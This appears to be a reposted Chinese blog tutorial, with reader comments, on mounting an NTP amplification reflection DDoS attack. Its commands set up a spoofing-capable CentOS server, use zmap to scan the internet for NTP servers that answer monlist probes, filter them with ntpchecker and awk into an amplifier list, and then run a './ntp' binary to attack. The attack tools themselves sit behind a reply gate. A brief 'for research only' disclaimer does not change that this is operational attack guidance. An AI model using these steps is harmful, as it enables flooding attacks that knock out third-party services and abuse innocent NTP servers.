菜单

NTP放大反射DDOS攻击扫描教程,放大列表扫描教程

2017年10月15日 - 转载

NTP放大反射DDOS攻击扫描教程,放大列表扫描教程

图上是国外测的 本文实测 能有二三十G

声明:文章中介绍的工具、技术带有一定的攻击性,仅供安全研究,请合理合法使用。!
关于有些服务器不能发起攻击的问题 请自己检查系统 实测脚本没有问题!
注意服务器要支持ip伪造/欺骗

本文使用的服务器系统
centos 6.6 64位
内核
2.6.32-504.el6.x86_64

先更新系统
yum -y update
复制代码

区分centos6 centos7 执行不同的命令!
Centos 6
wget http://dl.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm
sudo rpm -Uvh epel-release-6-8.noarch.rpm
复制代码
centos 7
wget http://dl.fedoraproject.org/pub/epel/7/x86_64/e/epel-release-7-5.noarch.rpm
sudo rpm -Uvh epel-release-7-5.noarch.rpm
复制代码

安装必要的依赖环境!
yum -y install gcc libcap libpcap libpcap-devel screen php dstat cmake gmp gmp-devel gengetopt byacc flex git json-c cpan vnstat zmap
复制代码

上传这里的文件到你的机器!
游客,如果您要查看本帖隐藏内容请回复

开始扫描ntp放大列表
zmap -p 123 -M udp –probe-args=file:ntp_123_monlist.pkt -o monlist_fingerprint.txt
复制代码
扫描时间比较长
扫描完成后

运行 ntp、ntpchecker
首先给它的权限:
chmod 777 ntp
chmod 777 ntpchecker
复制代码

运行ntpchecker
./ntpchecker monlist_fingerprint.txt step1.txt 1 0 1
复制代码

开始执行过滤!
awk ‘$2>419{print $1}’ step1.txt | sort -n | uniq | sort -R > ntpamp.txt
复制代码

过滤完成后就可以攻击了
./ntp

标签:

NTP放大反射DDOS攻击扫描教程,放大列表扫描教程》有20个想法

从心

666 学习了

回复
游客

看看效果怎么样

回复
十八

研究NTP,感谢楼主

回复
    emm

    谢谢楼主,

    回复
    筱阳

    看看,谢谢楼主

    回复
啊卫

谢谢楼主,真的很不错

回复
xy

可以可以,学习了

回复
王琳

可以可以,学习了

回复
DNNG

牛逼啊·不过脚本软件的下载地址挂了!

回复
ly

研究一下~

回复

xy进行回复 取消回复

电子邮件地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据